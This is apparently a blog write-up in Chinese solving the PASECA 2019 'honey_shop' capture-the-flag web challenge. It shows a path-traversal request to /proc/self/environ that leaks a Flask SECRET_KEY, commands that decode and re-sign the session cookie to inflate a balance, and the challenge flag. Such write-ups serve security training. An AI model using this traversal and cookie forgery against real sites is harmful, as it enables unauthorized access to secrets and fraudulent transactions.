2019PASECA-honey_shop

https://github.com/CTFTraining/pasecactf_2019_web_honey_shop

点击图片发现能够下载,抓包发现确实有文件下载漏洞:

环境变量:

/download?image=../../../../proc/self/environ


发现是python环境
还发现了SECRET_KEY

SECRET_KEY=QNxewrUcqJX8iHWJdqhyqyCgg9j1etEfEEO8B8vv

先解密:

flask-unsign --unsign --cookie 'eyJiYWxhbmNlIjoxMzMxLCJwdXJjaGFzZXMiOlsiTGluZGVuIGhvbmV5Il19.Zur61A.eT598oHkN5ey16mv4i7EMioRask'

python3 flask_session_cookie_manager3.py decode -c 'eyJiYWxhbmNlIjoxMzMxLCJwdXJjaGFzZXMiOlsiTGluZGVuIGhvbmV5Il19.Zur61A.eT598oHkN5ey16mv4i7EMioRask' -s 'QNxewrUcqJX8iHWJdqhyqyCgg9j1etEfEEO8B8vv'


{'balance': 1331, 'purchases': ['Linden honey']}

再加密:

{'balance': 222331, 'purchases': ['Linden honey']}

python flask_session_cookie_manager3.py encode -s 'QNxewrUcqJX8iHWJdqhyqyCgg9j1etEfEEO8B8vv' -t "{'balance': 222331, 'purchases': ['Linden honey']}"

修改后购买flag即可:

flag{2c88207c-96a7-4e4a-9b29-b22ccdbaa263}

收获

到处点点说不定有什么收获,如文件下载漏洞之类的
SECRET_KEY可能在环境变量中

/proc/self/environ

然后就是flask session的加密与解密

posted @ 2024-10-14 15:03  starme  阅读(16)  评论(0)    收藏  举报